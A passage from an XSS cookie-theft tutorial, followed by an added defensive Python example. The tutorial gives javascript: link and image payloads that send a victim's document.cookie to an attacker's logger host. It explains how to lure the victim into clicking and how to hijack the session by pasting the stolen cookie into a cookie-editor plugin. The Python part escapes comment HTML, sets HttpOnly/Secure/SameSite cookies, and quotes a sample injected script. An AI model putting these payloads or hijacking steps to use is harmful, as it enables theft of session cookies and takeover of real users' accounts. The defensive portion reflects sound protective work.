You can also trick the victim into clicking a link that activates the JavaScript.
Below is the code which has to be posted.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">

<img src="URL OF THE IMAGE"/></a>

All the details like the cookie, IP address and browser of the victim are logged to log.txt on your host.

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin.

Go to the target site --> open the cookie editor --> replace the cookie with the stolen cookie of the victim and refresh the page. That's it! You should now be in his account.
Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
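
The two server-side controls that defeat the technique described in this tutorial, as an added example that is not part of the tutorial: escaping user-posted comment text before it is rendered (so the injected `<script>` stays inert text) and issuing the session cookie with HttpOnly, Secure and SameSite so document.cookie cannot read it. The cookie name, the ".invalid" host and the sample comment are constructed for the demonstration.

```python
# Added example: defensive counterpart to the cookie-theft tutorial above.
# Cookie name and sample inputs are constructed, not taken from any real site.
import html
from http import cookies

SESSION_COOKIE = "PHPSESSID"  # assumption: typical session cookie name for a PHP app


def render_comment(user_text):
    """Escape user-supplied comment text before it is placed in the page.

    The attack relies on the site echoing the posted <script> back verbatim;
    after escaping, the browser shows it as literal text and never executes it.
    """
    return '<p class="comment">' + html.escape(user_text, quote=True) + "</p>"


def session_cookie_header(session_id, secure=True):
    """Build a Set-Cookie value that keeps the session id out of document.cookie.

    HttpOnly blocks script access, Secure keeps it off plain HTTP, and
    SameSite=Lax stops the browser attaching it to most cross-site requests.
    """
    jar = cookies.SimpleCookie()
    jar[SESSION_COOKIE] = session_id
    jar[SESSION_COOKIE]["httponly"] = True
    jar[SESSION_COOKIE]["secure"] = secure
    jar[SESSION_COOKIE]["samesite"] = "Lax"
    jar[SESSION_COOKIE]["path"] = "/"
    return jar[SESSION_COOKIE].OutputString()


def audit_set_cookie(header_value):
    """Return the protections missing from a Set-Cookie value (empty list = fine)."""
    attrs = {part.strip().split("=")[0].lower() for part in header_value.split(";")[1:]}
    missing = []
    for attr, label in (("httponly", "HttpOnly"), ("secure", "Secure"), ("samesite", "SameSite")):
        if attr not in attrs:
            missing.append(label)
    return missing


# Constructed sample: the kind of comment body the tutorial above describes posting.
INJECTED_COMMENT = (
    '<script>document.location="http://www.example.invalid/cookielogger.php?cookie="'
    "+document.cookie;</script>"
)

if __name__ == "__main__":
    print(render_comment(INJECTED_COMMENT))
    print(session_cookie_header("CONSTRUCTED_SESSION_ID"))
    print(audit_set_cookie("PHPSESSID=abc; path=/"))
```

A cookie that audit_set_cookie reports as missing HttpOnly is exactly the kind the tutorial's logger can capture; with HttpOnly set, document.cookie returns nothing for it.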